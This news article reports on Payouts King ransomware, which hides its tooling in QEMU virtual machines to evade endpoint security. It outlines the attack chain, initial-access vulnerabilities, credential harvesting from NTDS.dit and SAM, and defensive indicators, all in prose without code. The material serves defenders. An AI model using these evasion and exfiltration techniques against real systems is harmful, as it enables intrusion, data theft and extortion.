Payouts King Ransomware Hides Inside QEMU VMs to Dodge Endpoint Security

A new ransomware operation called Payouts King is deploying hidden virtual machines on compromised systems to evade endpoint detection. The technique exploits a fundamental limitation: security software running on a host cannot inspect activity inside a guest VM.

Sophos researchers documented the campaign, linking it to former BlackBasta affiliates based on shared tactics. The group uses QEMU, an open-source CPU emulator, to run Alpine Linux instances that stay invisible to host-based security tools.

How the QEMU Evasion Works

The attack chain is straightforward but effective. After gaining initial access — typically through exposed VPNs or social engineering — the attackers deploy a QEMU installation package containing a pre-configured Alpine Linux VM image.

A scheduled task named "TPMProfiler" launches the VM with SYSTEM privileges. The virtual disk files are disguised as databases and DLLs to avoid raising suspicion during casual inspection. Once running, the VM establishes reverse SSH tunnels back to attacker infrastructure.

From inside the VM, attackers deploy their actual tooling: AdaptixC2 for command and control, Chisel for tunneling, BusyBox for utility operations, and Rclone for data exfiltration. All of this activity occurs within the VM boundary, invisible to EDR, antivirus, and behavioral detection running on the Windows host.

The encryption itself uses AES-256 in CTR mode with RSA-4096 key wrapping. For larger files, they employ intermittent encryption — encrypting only portions of the file to speed up the process while still rendering data unusable.

Connection to BlackBasta

Zscaler researchers identified operational overlaps with BlackBasta, one of the more prolific ransomware operations of recent years. The similarities include:

• Spam bombing campaigns to overwhelm targets
• Microsoft Teams phishing to deliver initial payloads
• Abuse of Quick Assist for unauthorized remote access
• Credential harvesting focused on NTDS.dit and SAM hives

BlackBasta's recent operational disruptions may have pushed affiliates toward new brands. Payouts King appears to be one such rebranding effort, carrying forward proven tactics while adding the VM evasion layer.

Initial Access Vectors

Sophos documented two distinct campaign tracks:

STAC4713 (active since November 2025): Targets exposed SonicWall VPNs, exploits SolarWinds Web Help Desk vulnerabilities (CVE-2025-26399), and compromises Cisco SSL VPN deployments.

STAC3725 (active since February 2026): Exploits CitrixBleed 2 to compromise NetScaler devices, then deploys ScreenConnect for persistence before dropping the QEMU package.

Both tracks converge on the same post-exploitation methodology: establish VM-based infrastructure, harvest credentials, exfiltrate data, then encrypt.

Detection Guidance

The VM technique creates a visibility gap, but it's not undetectable. Sophos recommends monitoring for:

• Unauthorized QEMU installations — the emulator is legitimate software but unusual on most endpoints
• Scheduled tasks running with SYSTEM privileges — especially those with hardware-sounding names like "TPMProfiler"
• SSH port forwarding activity — reverse tunnels are a hallmark of this technique
• Outbound SSH on non-standard ports — attackers often avoid port 22 to blend in

Network-level detection can catch what endpoint tools miss. The reverse SSH tunnels generate traffic patterns that differ from normal outbound connections.

Why This Matters

VM-based evasion isn't new — Ragnar Locker used VirtualBox in 2020 for similar purposes. But the technique has matured. Modern implementations are lighter weight, harder to detect, and increasingly common as EDR coverage improves.

The ongoing evolution of ransomware tactics reflects a cat-and-mouse dynamic. As endpoint detection gets better at catching traditional malware behavior, attackers move their operations into spaces those tools can't reach. VMs are one such space. Encrypted traffic is another. And as we've seen with recent blockchain-based command and control, attackers are finding increasingly creative hiding spots.

For defenders, the takeaway is that endpoint protection alone isn't sufficient. Network monitoring, behavioral analytics at the hypervisor level, and anomaly detection for process creation and scheduled tasks all become more important when attackers can operate from within isolated VMs.

Indicators of Compromise

Organizations should search for:

• QEMU binaries in unexpected locations
• Scheduled tasks creating VM processes
• Alpine Linux disk images disguised as .dll or .db files
• Reverse SSH connections to external infrastructure
• Credential access to NTDS.dit, SAM, and SYSTEM hives

The supply chain attacks we've tracked recently show that initial access is getting easier for sophisticated groups. Once inside, techniques like VM-based evasion let them operate with impunity. Defense needs to account for both stages.